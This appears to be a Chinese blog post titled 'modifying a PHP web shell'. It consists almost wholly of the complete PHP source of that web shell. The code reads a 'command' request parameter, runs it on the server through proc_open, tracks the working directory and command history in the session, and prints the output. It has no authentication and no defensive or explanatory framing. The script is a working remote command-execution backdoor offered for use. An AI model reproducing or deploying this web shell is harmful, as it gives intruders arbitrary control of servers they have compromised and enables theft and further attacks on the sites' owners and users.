[置顶] 改一个PHP WEB SHELL

<?php
define("WINDOWS",1) ;
function GBK2UTF8($text=null){
if (!empty($text) && function_exists('iconv')){
return iconv("GBK", "UTF-8", $text);
}
return $text ;
}

function remove_blanklines($str){
return $str ? preg_replace("/(^[\r\n]*|[\r\n]+)[\s\t]*[\r\n]+/", "\n", trim($str)): '' ;
}
class Webshell {

private $default_settings = null ;

function __init__(){
$this->default_settings = array('home-directory'   => '.');
$_SESSION['cwd'] = realpath($this->default_settings['home-directory']);
$_SESSION['history'] = array();
$_SESSION['output'] = '';
}

function run(){
if (empty($_SESSION['cwd'])) {
$this->__init__();
}
$command = $_REQUEST['command'] ;
if (!empty($command)){
$command = trim($command);
$this->_exec($command);
}
}

function _exec($command){
if (!empty($command)) {
if (($i = array_search($command, $_SESSION['history'])) !== false)
unset($_SESSION['history'][$i]);

array_unshift($_SESSION['history'], $command);

$_SESSION['output'] .= (empty($_SESSION['output'])?'':"\n\n") . "$ {$command}\n" ;

/* Initialize the current working directory. */
if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $command)) {
$_SESSION['cwd'] = realpath($this->default_settings['home-directory']);
}
elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {
/* The current command is a 'cd' command which we have to handle
* as an internal shell command. */

if ($regs[1]{0} == '/') {
/* Absolute path, we use it unchanged. */
$new_dir = $regs[1];
} else {
/* Relative path, we append it to the current working
* directory. */
$new_dir = $_SESSION['cwd'] . '/' . $regs[1];
}

/* Transform '/./' into '/' */
while (strpos($new_dir, '/./') !== false)
$new_dir = str_replace('/./', '/', $new_dir);

/* Transform '//' into '/' */
while (strpos($new_dir, '//') !== false)
$new_dir = str_replace('//', '/', $new_dir);

/* Transform 'x/..' into '' */
while (preg_match('|/\.\.(?!\.)|', $new_dir))
$new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir);

if ($new_dir == '') $new_dir = '/';
/* Try to change directory. */
if (@chdir($new_dir)) {
$_SESSION['cwd'] = $new_dir;
} else {
$_SESSION['output'] .= "cd: could not change to: $new_dir\n";
}

}
else {

// We canot use putenv() in safe mode.
if (!ini_get('safe_mode')) {
// Advice programs (ls for example) of the terminal size.
putenv('ROWS=' . 80);
putenv('COLUMNS=' . 600);
}

$shell_result = '' ;
$io = array();
$p = proc_open($command,array(1 => array('pipe', 'w'),2 => array('pipe', 'w')),$io,$_SESSION['cwd']);

/* Read output sent to stdout. */
while (!feof($io[1])) {
$shell_result .= htmlspecialchars(fgets($io[1]));
}
/* Read output sent to stderr. */
while (!feof($io[2])) {
$shell_result .= htmlspecialchars(fgets($io[2]));
}

fclose($io[1]);
fclose($io[2]);
proc_close($p);

$shell_result = (WINDOWS)? GBK2UTF8($shell_result):$shell_result;
$shell_result = remove_blanklines($shell_result);

$_SESSION['output'] .= $shell_result;

}
}

/* Build the command history for use in the JavaScript */
if (empty($_SESSION['history'])) {
$js_command_hist = '""';
} else {
$escaped = array_map('addslashes', $_SESSION['history']);
$js_command_hist = '"", "' . implode('", "', $escaped) . '"';
}

echo "<PRE>{$_SESSION['output']}</PRE>" ;
}
}

$inst = new Webshell();
$inst->run();